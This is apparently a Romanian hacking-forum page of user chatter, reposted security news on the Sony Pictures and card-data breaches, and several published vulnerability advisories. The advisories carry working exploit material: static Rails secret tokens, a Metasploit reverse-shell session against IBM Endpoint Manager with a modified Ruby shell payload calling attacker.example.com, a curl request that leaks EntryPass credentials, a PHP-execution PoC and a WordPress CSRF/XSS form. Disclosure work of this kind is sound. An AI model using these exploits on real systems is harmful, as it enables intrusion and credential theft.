Aerosol

Bun venit, ce stii sa faci? nu ne pasa ca n-ai copii sau nu esti casatorit nu e site de matrimoniale.

@Che din cate scrie acolo e ilegal sa ai havij, acunetix, si putty (nu te poti pune cu gabori) ) Reactia unui gabor in fata unui pc cu linux "sefu' nu gasesc control panel"

@lauryca domeniu .com ieftin pe godaddy https://uk.godaddy.com/

WTF, ba da gaborii nu mai au ce sa faca ? cate absurditati din partea lor... Daca respectivul site are program de bug bounty ce e in neregula cu asta.

@quadxenon prietene a doua oara i-am raspuns lu' carter si hai sa te fac sa intelegi. pretul vechi era mai mic, acum dupa "acea gafa" l-au marit ca sa isi scoata banii daca nu intelegi nu e problema mea, termina cu off-topicul, decat sa imi comentezi la fiecare post al meu tu si restul copiilor mai bine ajutati pe cineva. ex: Categoria Ajutor & Cereri. daca sunteti aici doar pentru spam & troll +offtopic nu e treaba mea. hai ca mi-am pierdut 2 minute din viata mea importanta pentru tine.

Copile cum iti permiti sa vi aici facand reclama la o metoda stupida fiindca sa fim seriosi in timpul pierdut cu asta poti invata ceva util si constructiv. nu vi tu un mucos sa te iei de @blech bre da cum iti permiti tu sa te iei de el doar are 17 ani ))

@kab00M!! Tutorial: asta merge daca e conectat pe laptop. eu mi-am recuperat emailul in felul asta.

Asta nu mai e strategie asa isi scot ei parleala man au pierdut bani pe-o parte dar scoate acum din chestia asta mai mult.

Deja se instaureaza comunismul pe internet, auzi spatiu public Doamne da cum dracu gandesc ei legile astea de rahat...

) sunt baietii destepti nu? uite cum isi scot banii "pierduti" sa mai spuneti voi ca nu a fost strategie de marketing. stati ba linistiti ca astia nu sunt prosti sa iasa in pierdere, reclama gratis + acum vor creste preturile.

What a horrible start the holiday season in U.S. Over Thanksgiving weekend, Sony Pictures Entertainment suffered a massive data breach as "Guardians of Peace" hacked-into Sony Pictures' computer system that brought the studio's network to a screeching halt. Following the hack, hackers leaked five unreleased Sony movies to Torrent file-sharing website during Black Friday. It's still not clear whether both the incident back to back with Sony Pictures belongs to same group of hackers or not, but here's what you need to know about the breach: 1. FBI MALWARE WARNING AFTER SONY PICTURES HACK The U.S. Federal Bureau of Investigation (FBI) warned businesses that cyber criminals have used malicious software to launch destructive cyber-attacks in the United States, following the last week's massive data breach at Sony Pictures Entertainment, in which four unreleased films were stolen and pirate-shared. In a five-page confidential 'flash' warning, FBI recommended users to strengthen the protection of their information systems and limit access to databases. But when asked if the same malicious software had been used against the Sony Pictures hack, FBI declined to comment. This new "destructive" malware has capability to overwrite a victim host's master boot record and all data files. "The overwriting of the data files will make it extremely difficult and costly, if not impossible, to recover the data using standard forensic methods," according to Reuters who independently obtained the report. 2. IS NORTH KOREA BEHIND THE CYBER ATTACK ON SONY PICTURES ? As we reported earlier, Sony Pictures is investigating the possibility that hackers working on behalf of North Korea were behind the hacking incident. Sony hack is the payback for upcoming Kim Jong assassination comedy film. It is because the hack comes just a month before the scheduled release of Sony's upcoming comedy "The Interview," a comedy about two journalists who are recruited by the CIA to assassinate North Korean leader Kim Jong Un. The film became a source of international controversy, and the Pyongyang government denounced the film as "undisguised sponsoring of terrorism, as well as an Act of War" in a letter to U.N. Secretary-General Ban Ki-moon in June. But pointing finger towards North Korea without any strong evidence would be wrong. So, we still won't confirm whether its cyber war by North Korea or some other unknown, sophisticated hacker. 3. FIVE MOVIE LEAKED LINKED TO SONY PICTURES Following the last weeks cyber-attack on Sony Pictures Entertainment, high-quality versions of five newest films – Annie, Fury, Still Alice, Mr. Turner and To Write Love on Her Arms – distributed by Sony Pictures leaked online during Black Friday. Four of the leaked films have yet to hit the big screen. The remake of the 1982 released "Annie" is Sony's next big film, schedule to hit theaters on Dec. 19 with new stars Quvenzhané Wallis, Cameron Diaz and Jamie Foxx. Two other new films, "Mr. Turner" and "Still Alice" are also considered possible Oscar contenders for their lead actors Timothy Spall and Julianne Moore. 4. SONY HIRED FIREEYE FOR INVESTIGATION Sony Pictures Entertainment has hired Mandiant incident response team of FireEye Inc to help clean-up the damage caused by the huge cyber attack on its network, which forced its employees to put pen to paper over the last few weeks. In addition to the FireEye, FBI is also investigating the matter and is looking into the devastating leak of four of its upcoming movies, although it has not been confirmed that the leak of all the films came from the same data breach. Mandiant is a well-known security incident response team of FireEye which deals in forensic analysis, repairs and network restoration. Mandiant is the same team that helped in the catastrophic security breach experienced by one of the world's largest retailer Target in 2013. 5. SONY PICTURES HACK IS NOT THE COMPANY'S FIRST TIME HACK In August, Sony's PlayStation Network was completely taken down by a distributed denial-of-service (DDoS) attack, a common technique used by hackers to overwhelm a system with traffic and make the network temporarily inaccessible to users. The gaming network also suffered a more severe hack in 2011, which led to the exposure of 77 million PlayStation and Qriocity accounts along with 25 million Sony Online Entertainment accounts, bringing the total to more than 100 million in one of the largest data breaches ever. The hack cost Sony 14 billion yen ($172 million), and it took the networks -- for downloading and playing games, movies, and music -- offline for about a month before bringing them back up. Source

Sursa: http://dl.packetstormsecurity.net/1412-exploits/rt-sa-2014-012.txt Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components During a penetration test, RedTeam Pentesting discovered that several IBM Endpoint Manager Components are based on Ruby on Rails and use static secret_token values. With these values, attackers can create valid session cookies containing marshalled objects of their choosing. This can be leveraged to execute arbitrary code when the Ruby on Rails application unmarshals the cookie. Details ======= Product: IBM Endpoint Manager for Mobile Devices Affected Components: Enrollment and Apple iOS Management Extender, Mobile Device Management Self-Service Portal, Mobile Device Management Admin Portal and Trusted Service Provider Affected Versions: All versions prior to 9.0.60100 Fixed Versions: 9.0.60100 Vulnerability Type: Unauthenticated Remote Code Execution Security Risk: high Vendor URL: http://www-03.ibm.com/software/products/en/ibmendpmanaformobidevi http://www-01.ibm.com/support/docview.wss?uid=swg21691701 Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-012 Advisory Status: published CVE: CVE-2014-6140 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6140 Introduction ============ "IBM Endpoint Manager for Mobile Devices provides a completely integrated approach for managing, securing, and reporting on laptops, desktops, servers, smartphones, tablets, and even specialty devices such as point-of-sale terminals. This provides customers with unprecedented real-time visibility and control over all devices employees use in their daily job functions; reducing costs, increasing productivity, and improving compliance." (from the vendor's homepage) More Details ============ IBM Endpoint Manager for Mobile Devices is part of the IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) product family. Several components related to mobile device management can be installed either on the main TEM Server, or on so-called TEM Relays, and are then accessible via HTTPS at port 443 of the respective system, such as: Path Component / Enrollment and Apple iOS Management Extender /ssp/ Mobile Device Management Self-Service Portal /ap/ Mobile Device Management Admin Portal /tsp/ Trusted Service Provider When issuing HTTP requests to any of these paths, the respective server responds in a manner similar to the following example: $ curl -skI https://tem.example.com/ HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 X-UA-Compatible: IE=Edge,chrome=1 [...] Set-Cookie: _mdm_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjU wODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkk iMTQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ 9BjsARg%3D%3D--e48265ee63dd90381caa92248d27162f67b1ea06; path=/; secure; HttpOnly [...] X-Rack-Cache: miss Content-Length: 0 Server: Jetty(8.1.14.v20131031) While the Server header indicates that the web applications are hosted on a Jetty Java application server, the X-Rack-Cache header and the cookie format are typically used by Ruby on Rails applications. The cookie is in fact a Base64 encoded marshalled Ruby object protected by an HMAC (the hexadecimal value following the two dashes). The cookie value can be unmarshalled as follows: $ ruby -e 'puts Marshal.load("BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZj'\ 'YTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiM'\ 'TQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg==".'\ 'unpack("m0")[0])' {"session_id"=>"8cf6ca2165088581b161cafa0a604837", "_csrf_token"=>"46KewnSgCW1xjZ7XR3HK265eAiOmkl1o/daRN5x3v94="} To create a cookie with a valid HMAC requires knowledge of a secret stored on the application server. In Ruby on Rails version 3 applications, this value is normally stored in the variable secret_token that is set in the file config/initializers/secret_token.rb. It is good practice to generate these values randomly when an application is installed. The IBM Endpoint Manager components, however, use static values that are the same across all installations. These values can be determined by manually inspecting the web application archives (e.g. ap.war, ios.war, ssp.war, tsp.war) installed into the directory C:\Program Files\BigFix Enterprise\Management Extender\MDM Provider\webapps of the respective server. The Enrollment and Apple iOS Management Extender, for example, is contained in the file ios.war. The archive contains a Ruby on Rails web application that was compiled to Java class files. The secret token needed for calculating the HMAC is contained in the file WEB-INF/config/initializers/secret_token.class: $ strings WEB-INF/config/initializers/secret_token.class \ | egrep -o '[0-9a-f]{128}' 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e0 2cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365 It can be verified that this secret is used for generating the HMAC that protects the cookie value by using the OpenSSL command line utility to calculate an HMAC of the aforementioned Base64 encoded data: $ echo -n 'BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUwODg1ODFiMT'\ 'YxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNnQ1cxeG'\ 'paN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg=='\ | openssl dgst -sha1 -hmac '65c0eb133b2c8481b08b41cfc0969cbdd540f3c1'\ 'ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd'\ '4895a4e2805712fa6365' (stdin)= e48265ee63dd90381caa92248d27162f67b1ea06 The resulting value is identical to the HMAC originally appended to the cookie. Once the secret is known, arbitrary cookie values can be crafted and sent to the respective application for further processing. As demonstrated by Metasploit's rails_secret_deserialization exploit module[0], this can be leveraged into executing arbitrary code on the application server (see also Proof of Concept below). For reference, the following cookie names and secret_token values were identified for the different web applications: Enrollment and Apple iOS Management Extender Path: / Cookie: _mdm_session Secret: 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730 d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365 Mobile Device Management Self-Service Portal Path: /ssp/ Cookie: _self-service-portal_session Secret: c5f5da7e3ae1baa9a10f4429b5e7c8aec217b3b53851272bd8f533d47acade48 0863a810630039c7987b04ff70c125512e74a998f8a028080c05265a97c747a3 Mobile Device Management Admin Portal Path: /ap/ Cookie: _admin-portal_session Secret: 2556dea5fbbd90c4a79202a43bdf9bd4c391c67159d021ea8bc478f29801d024 78acb273c2f425cf487c27669af5dbc3fdaf7f870e23a0a544dee04ab2169220 Trusted Service Provider Path: /tsp/ Cookie: _trusted-services-provider_session Secret: b52a3979462299e3a11f6c7c893a980f312fa8e5944fb8fdc74a400c55677aed ba00ce6df9e2d9ef1525c6ab68a2b6dca9e9ba557c0c6d579a1325ec6338178b Exploiting the Trusted Service Provider application was not tested, due to the lack of a properly configured testing environment. However, it is a Ruby on Rails web application deployed to the Jetty application server just like the other applications so that it is likely also vulnerable. This was confirmed by the vendor. Proof of Concept ================ The following listing shows a sample Metasploit session demonstrating the execution of arbitrary code through the Enrollment and Apple iOS Management Extender application: ------------------------------------------------------------------------ msf > use exploit/multi/http/rails_secret_deserialization msf exploit(rails_secret_deserialization) > set PAYLOAD ruby/shell_reverse_tcp PAYLOAD => ruby/shell_reverse_tcp msf exploit(rails_secret_deserialization) > set LHOST attacker.example.com LHOST => attacker.example.com msf exploit(rails_secret_deserialization) > set RHOST tem.example.com RHOST => tem.example.com msf exploit(rails_secret_deserialization) > set RPORT 443 RPORT => 443 msf exploit(rails_secret_deserialization) > set SSL true SSL => true msf exploit(rails_secret_deserialization) > set SSLVERSION TLS1 SSLVERSION => TLS1 msf exploit(rails_secret_deserialization) > set SECRET 65c0eb133b2c8481 b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610a d7dc00f6f9942e3825fd4895a4e2805712fa6365 SECRET => 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d097 30d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365 msf exploit(rails_secret_deserialization) > set PrependFork false PrependFork => false msf exploit(rails_secret_deserialization) > exploit [*] Started reverse handler on attacker.example.com:4444 [*] Checking for cookie [*] Adjusting cookie name to _mdm_session [+] SECRET matches! Sending exploit payload [*] Sending cookie _mdm_session [*] Command shell session 1 opened (attacker.example.com:4444 -> tem.example.com:50169) at 2014-08-15 13:37:31 +0200 cmd.exe /c ver whoami Microsoft Windows [Version 6.1.7601] nt authority\system ------------------------------------------------------------------------ The following changes needed to be applied to the Metasploit Framework to be able to exploit the issue. Most of them were required to address peculiarities of the Java/JRuby environment, such as the lack of support for Kernel.fork(): ------------------------------------------------------------------------ diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 7803dd5..e72d8c2 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote # - # This stub ensures that the payload runs outside of the Rails process - # Otherwise, the session can be killed on timeout + # This stub tries to ensure that the payload runs outside of the Rails + # process Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first - if RUBY_PLATFORM =~ /mswin|mingw|win32/ - inp = IO.popen("ruby", "wb") rescue nil - if inp - inp.write(code) - inp.close - end + if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") rescue nil) + inp.write(code) + inp.close else - Kernel.fork do + def _fork + begin + Kernel.fork + rescue NotImplementedError + -1 + end + end + pid = _fork + if 0 == pid or -1 == pid eval(code) end end @@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => datastore['HTTP_METHOD'], }, 25) if res && !res.get_cookies.empty? - match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) + match = res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/) end if match diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index f17c669..0100929 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb @@ -37,8 +37,31 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - "require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" + - "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" + - "(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }" + ruby = <<-EOF +require 'socket' +c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i}) +def reopen(old, new) + begin + old.reopen(new) + rescue IOError => e + new + end +end + +$stdin = reopen($stdin, c) +$stdout = reopen($stdout, c) +$stderr = reopen($stderr, c) +$stdin.each_line{ |l| l=l.strip + + next if l.length==0 + + (IO.popen(l,"rb") { |fd| + fd.each_line { |o| + c.puts(o.strip) + } + }) rescue nil +} + EOF + ruby end end ------------------------------------------------------------------------ Workaround ========== It might be possible to binary patch the Java class files to use a different secret_token value and redeploy the application. This is untested, however. Fix === Install version 9.0.60100 of the affected software components. Security Risk ============= The vulnerability allows unauthenticated remote attackers to execute arbitrary code with administrative privileges on the affected systems. It is highly likely that a successful attack on the application server can also be leveraged into a full compromise of all devices managed through the product. This constitutes a high risk. Timeline ======== 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-08-15 Vendor notified, vendor acknowledges receiving the advisory 2014-09-03 Update requested from vendor 2014-09-05 Vendor promises to respond with more details 2014-09-26 Update requested from vendor 2014-09-30 Vendor promises to respond with more details 2014-10-16 Update requested from vendor 2014-10-16 Vendor responds with CVE-ID, plans release for mid-November 2014-11-06 More definite release schedule requested 2014-11-12 Vendor plans release for last week of November 2014-11-21 Additional details requested from vendor 2014-11-22 Vendor responds with details, postpones release to mid-December due to issues discovered during quality control 2014-12-01 Vendor announces imminent release 2014-12-01 Vendor releases security bulletin and software upgrade 2014-12-02 Customer approves public disclosure 2014-12-02 Advisory released References ========== [0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb

On:// tutorialul e cat de cat ok. @Bratuleanu123 ce sunt pozele alea? din cate vad stai pe windows... ce dovezi sunt alea? mega-ultra-superFACEPALM...

Tare sunt curios de cand e vulnerabilitatea ma refer ca vechime nu cand a fost descoperita... "baietii rai" nu dorm niciodata

Nu are cum sa fie afectat laptopul, centrala ta nu e bomba electromagnetica Pana la urma ai rezolvat problema?

Advisory: EntryPass N5200 Credentials Disclosure EntryPass N5200 Active Network Control Panels allow the unauthenticated downloading of information that includes the current administrative username and password. Details ======= Product: EntryPass N5200 Active Network Control Panel Affected Versions: unknown Fixed Versions: not available Vulnerability Type: Information Disclosure, Credentials Disclosure Security Risk: high Vendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200 Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011 Advisory Status: published CVE: CVE-2014-8868 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868 Introduction ============ "EntryPass Active Networks are designed to enhance highly customized and rapid 'real-time' changes to the underlying network operation. Brilliantly engineered with all the power you need to enable code-sending, minus unnecessary buffer time with its distributed architecture capable of processing access demand at the edge level without leveraging at the server end." (From the vendor's home page) More Details ============ EntryPass N5200 Active Network Control Panels offer an HTTP service on TCP port 80. It appears that only the first character of a requested URL's path is relevant to the web server. For example, requesting the URL http://example.com/1styles.css yields the same CSS file as requesting the following URL: http://example.com/1redteam By enumerating all one-character long URLs on a device, it was determined that URLs starting with a numeric character are used by the web interface, as listed in the following table: http://example.com/0 Index http://example.com/1 Stylesheet http://example.com/2 Authentication with Username/Password http://example.com/3 Session Management http://example.com/4 Device Status http://example.com/5 Progressbar Image http://example.com/6 Reset Status http://example.com/7 Login Form http://example.com/8 HTTP 404 Error Page http://example.com/9 JavaScript For URLs starting with non-numeric characters, an HTTP 404 - Not Found error page is normally returned. Exceptions to this rule are URLs starting with the lower case letters o to z and the upper case letters A to D. When requesting these URLs, memory contents from the device appear to be returned in the server's HTTP response. As highlighted in the following listing, both the currently set username ADMIN and the corresponding password 123456 are disclosed in the memory contents when requesting the URL http://example.com/o: $ curl -s http://example.com/o | hexdump -C | head [...] 0010 XX XX XX XX XX XX XX XX XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e| 0020 6e 74 72 79 70 61 73 73 2e 6e 65 74 00 00 00 00 |ntrypass.net....| [...] 0060 XX XX XX XX XX XX XX XX XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&| 0070 20 20 31 32 33 34 35 36 26 20 XX XX XX XX XX XX | 123456& XXXXXX| [...] These credentials grant access to the administrative web interface of the device when using them in the regular login form. Similarly, it is possible to get the status output of the device without prior authentication by simply requesting the following URL http://example.com/4 The server responds to the request with the following XML data, which contains information about various different settings of the device. <html> <head> <title>Device Server Manager</title> </head> <body> <serial_no>XXXXXXXXXXXX-XXXX</serial_no> <firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version> <mac_address>XX-XX-XX-XX-XX-XX</mac_address> <disable_reporting>disabled</disable_reporting> <commit_setting>checked</commit_setting> <user_id>ADMIN</user_id> <user_pass>******</user_pass> [...] </body> </html> Proof of Concept ================ ------------------------------------------------------------------------ $ curl -s http://example.com/o | hexdump -C | head ------------------------------------------------------------------------ Workaround ========== Access to the web interface should be blocked at the network layer. Fix === Not available. Security Risk ============= Attackers with network access to an EntryPass N5200 Active Network Control Panel can retrieve memory contents from the device. These memory contents disclose the currently set username and password needed to access the administrative interface of the device. Using these credentials, it is possible to read the device's current status and configuration, as well as modify settings and install firmware updates. With regards to the device itself, this vulnerability poses a high risk, as it allows attackers to gain full control. The actual operational risk depends on how the device is used in practice. Timeline ======== 2014-05-19 Vulnerability identified 2014-08-25 Customer approved disclosure to vendor 2014-08-27 Vendor contacted, security contact requested 2014-09-03 Vendor contacted, security contact requested 2014-09-15 Vendor contacted, vulnerability reported 2014-09-17 Update requested from vendor, no response 2014-10-15 No response from vendor. Customer discontinued use of the product and approved public disclosure 2014-10-20 Contacted vendor again since no fix or roadmap was provided. 2014-10-28 CVE number requested 2014-11-14 CVE number assigned 2014-12-01 Advisory released Source

Asta arata cat de dispuse sunt autoritatile sa sacrifice pentru a ajunge la rezultatul dorit... @Sithalkes stati linistit in caz ca nu gasesc ei nimic, or sa inventeze

deja si-au revenit, probabil efectuau niste lucrari la site...

Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf During a penetration test RedTeam Pentesting discovered a remote code execution vulnerability in the TYPO3 extension ke_dompdf, which allows attackers to execute arbitrary PHP commands in the context of the webserver. Details ======= Product: ke_dompdf TYPO3 extension Affected Versions: 0.0.3<= Fixed Versions: 0.0.5 Vulnerability Type: Remote Code Execution Security Risk: high Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007 Advisory Status: published CVE: CVE-2014-6235 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235 Introduction ============ "DomPDF library and a small pi1 to show how to use DomPDF to render the current typo3-page to pdf." (taken from the extension's description) More Details ============ The TYPO3 extension ke_dompdf contains a version of the dompdf library including all files originally supplied with it. This includes an examples page, which contains different examples for HTML-entities rendered as a PDF. This page also allows users to enter their own HTML code into a text box to be rendered by the webserver using dompdf. dompdf also supports rendering of PHP files and the examples page also accepts PHP code tags, which are then executed and rendered into a PDF on the server. Since those files are not protected in the TYPO3 extension directory, anyone can access this URL and execute arbitrary PHP code on the system. This behaviour was already fixed in the dompdf library, but the typo3 extension ke_dompdf supplies an old version of the library that still allows the execution of arbitrary PHP code. Proof of Concept ================ Access examples.php on the vulnerable system: http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php Enter PHP code in the text box on the bottom of the page and click the submit button, for example: ------------------------------------------------------------------------ <?php phpinfo() ?> ------------------------------------------------------------------------ The page will return a PDF file containing the output of the PHP code. Workaround ========== Remove the directory "www" containing the examples.php file or at least the examples.php file from the extensions' directory. Fix === Update to version 0.0.5 of the extension. Security Risk ============= high Timeline ======== 2014-04-21 Vulnerability identified 2014-04-30 Customer approved disclosure to vendor 2014-05-06 CVE number requested 2014-05-10 CVE number assigned 2014-05-13 Vendor notified 2014-05-20 Vendor works with TYPO3 security team on a fix 2014-09-02 Vendor released fixed version [2] 2014-12-01 Advisory released References ========== The TYPO3 extension ke_dompdf contains an old version of the dompdf library, which contains an example file that can be used to execute arbitrary commands. This vulnerability was fixed in dompdf in 2010. The relevant change can be found in the github repository of dompdf: [1] https://github.com/dompdf/dompdf/commit/ e75929ac6393653a56e84dffc9eac1ce3fb90216 TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions: [2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/ typo3-ext-sa-2014-010/ Source

# Exploit Title: Nextend Facebook Connect 1.4.59 XSS # Date: 16-10-2014 # Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek # Software Link: https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.4.59.zip # Category: webapps # CVE: CVE-2014-8800 1. Description Anyone can change plugin settings. File: nextend-facebook-connect\nextend-facebook-settings.php if(isset($_POST['newfb_update_options'])) { if($_POST['newfb_update_options'] == 'Y') { foreach($_POST AS $k => $v){ $_POST[$k] = stripslashes($v); } update_option("nextend_fb_connect", maybe_serialize($_POST)); $newfb_status = 'update_success'; } } http://security.szurek.pl/nextend-facebook-connect-1459-xss.html 2. Proof of Concept <form method="post" action="http://wordpress-instalation"> <input type="hidden" name="newfb_update_options" value="Y"> XSS: <textarea name="fb_login_button" rows="10" cols="40"><img src=x onerror=alert(String.fromCharCode(88,83,83))></textarea> <input type="submit" value="Hack!"> </form> 3. Solution: Update to version 1.5.1 https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.5.1.zip https://wordpress.org/plugins/nextend-facebook-connect/changelog/ Source

The holiday buying season is upon us once again. Another event that has arrived along with the buying season is the season of big box retailer data breaches. A year ago, the Target breach made national headlines, followed shortly thereafter by a breach at Home Depot. Both breaches got a lot of attention, primarily because the number of bank cards affected was so high—more than 70 million debit and credit card numbers exposed in the case of Target and 56 million exposed at Home Depot. Luckily, very little fraudulent activity occurred on the stolen card numbers, primarily because the breaches were caught fairly soon, making them relatively minor incidents in the scheme of things, compared with other breaches that have occurred over the years that resulted in losses of millions of dollars. The Target breach was notable for one other reason, however: when it came to security, the company did many things right, such as encrypting its card data and installing a multi-million-dollar state-of-the-art monitoring system not long before the breach occurred. But although the system worked exactly as designed, detecting and alerting workers when it appeared that sensitive data was being exfiltrated from its network, workers failed to act on these alerts to prevent data from being stolen. Below, we look back on a decade of notable breaches, many of which happened despite the establishment of Payment Card Industry security standards that are supposed to protect cardholder data and lessen the chance that it will be stolen or be useful to criminals even when it’s nabbed. The PCI security standard (.pdf) which went into effect in 2005, is a list of requirements — such as installing a firewall and anti-virus software, changing vendor default passwords, encrypting data in transit (but only if it crosses a public network) — that companies processing credit or debit card payments are required by card companies to have in place. Companies are required to obtain regular third-party security audits from an approved assessor to certify ongoing compliance. But nearly every company that was victim to a card breach was certified as compliant to the PCI security standard at the time of the breach, only to be found noncompliant in a post-breach assessment. 10. CardSystems Solutions – 40 million cards: CardSystems Solutions, a now-defunct card processing company in Arizona, holds the distinction of being the first major business to be breached following the passage of California’s breach notification law in 2002 — the first law in the nation requiring businesses to tell customers when their sensitive data has been stolen. The intruders placed a malicious script on the company’s network that was designed to sniff for card transaction data, resulting in the names, card numbers and security codes of some 40 million debit and credit cards being exposed to the hackers. CardSystems was storing unencrypted transaction data, after transactions were completed, in violation of the PCI security standard. The company was certified PCI compliant in June 2004 and discovered it had been breached in May 2005. 9. TJX – 94 million cards TJX was just one of more than a dozen retailers hacked by Albert Gonzalez and a team of cohorts, including two Russian hackers. They breached the TJX network in 2007 through war-dialing — a practice that involves driving by businesses and offices with an antenna hooked to a laptop with special software to suss out wireless networks. From TJX’s wireless network, they burrowed their way into the company’s card processing network, which was transmitting card data unencrypted. The initial breach occurred in July 2005 but wasn’t discovered until December 2006. Additional breaches occurred later in 2005, 2006 and even in mid-January 2007, after the initial had been discovered. The breach cost the company about $256 million. 8. Heartland Payment Systems – 130 million cards Albert Gonzalez earned his moniker as the TJX hacker, but the penultimate breach attributed to him and his Russian hacker gang was Heartland Payment Systems — a card processing company in New Jersey. The hack operation began small — focusing on TJX and other end retailers where customer card data was first collected. But they quickly realized the real gold was held by the card processors that aggregated millions of cards from multiple businesses before routing the card data to banks to be verified. Heartland was the Fort Know of processors with 250,000 businesses processing about 100 million card transactions through them each month. The company learned in October 2008 that it might have been hacked, but it took nearly three months to confirm the breach. The attackers had installed a sniffer in an unallocated portion of a Heartland server and eluded forensic investigators for months. Heartland had been certified compliant six times before the breach, including in April 2008. The breach began the next month, but wasn’t discovered until January 2009. It cost the company more than $130 million in fines, legal expenses and other costs, though the company recovered some of this through insurance. 7. RBS WorldPay – 1.5 million cards: The RBS hack isn’t significant for the number of cards affected — the hackers used only a small number of cards at their disposal for their heist — but for the amount of money they stole using the cards. This wasn’t a traditional retailer or card processing hack. RBS WorldPay is the payment-processing arm of the Royal Bank of Scotland and provides a number of electronic payment processing services, including electronic benefits transfer payments and prepaid cards, such as payroll cards — offered by some employers as a paperless alternative to paychecks. It discovered in November 2008 that intruders had accessed account details for 100 payroll cards and raised the balance on the compromised cards as well as their daily withdrawal limits. In some case, they raised the withdrawal limit to $500,000. They distributed the card details to an army of cashers who embedded the data onto blank cards. In a global coordinated heist, the cashers then hit more than 2,000 ATMs with the fraudulent cards, netting about $9.5 million in less than 12 hours. 6. Barnes and Noble – unknown This breach made the list for the first major operation involving point-of-sale terminals, though more than a year after the hack, Barnes and Noble has still provided no details about the breach or the number of cards affected. All that’s known is that the FBI began investigating the incident in September 2012. The skimming software was discovered on point-of-sale devices in 63 Barnes and Noble stores in nine states, though only one POS device in each store was affected. It’s not known how the skimmer was placed on the devices. 5. Canadian Carding Ring The Barnes and Noble heist was reminiscent of a Canadian operation that occurred months earlier and involved tampering with POS terminals in order to steal more than $7 million. Police said the group, based out of Montreal, operated in a coordinated fashion with military precision, doling out cloned cards to runners in lock boxes. One part of the gang was responsible for installing skimming devices on ATMs and for seizing point-of-sale machines (POS) from restaurants and retailers in order to install sniffers on them before returning them to the businesses. Police said the thieves took the POS machines to cars, vans and hotel rooms, where technicians hacked into the processors and rigged them so that card data could be siphoned from them remotely using Bluetooth. The modifications took only about an hour to accomplish, after which the devices were returned to the businesses before they re-opened the next day. The ring is believed to have had inside help from employees who took bribes to look the other way. 4. Unknown Card Processor in India and U.S. – unknown In a heist that was similar to the 